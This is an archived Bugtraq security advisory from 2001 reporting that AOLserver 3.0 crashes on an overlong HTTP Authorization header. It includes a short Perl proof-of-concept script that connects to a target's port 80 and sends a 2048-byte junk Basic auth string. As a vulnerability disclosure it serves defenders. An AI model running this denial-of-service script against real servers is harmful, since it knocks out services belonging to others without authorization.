[22381] in bugtraq
AOLserver 3.0 vulnerability
daemon@ATHENA.MIT.EDU (Nate Haggard)
Wed Aug 22 20:07:58 2001
Message-Id: <5.1.0.14.0.20010822165114.00a75bf0@pop.wordplace.com>
Date: Wed, 22 Aug 2001 16:51:45 -0600
To: bugtraq@securityfocus.com
From: Nate Haggard <nate@securitylogics.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Aolserver 3.0 will crash when it is given a long authorization string. It
is also possible this vulnerability will allow a hacker to execute
arbitrary code through a buffer overflow. I have not verified a buffer
overflow exists. Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.
Here is a sample exploit:
------------------------------------------
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;
--------------------
Nate Haggard
SecurityLogics.com
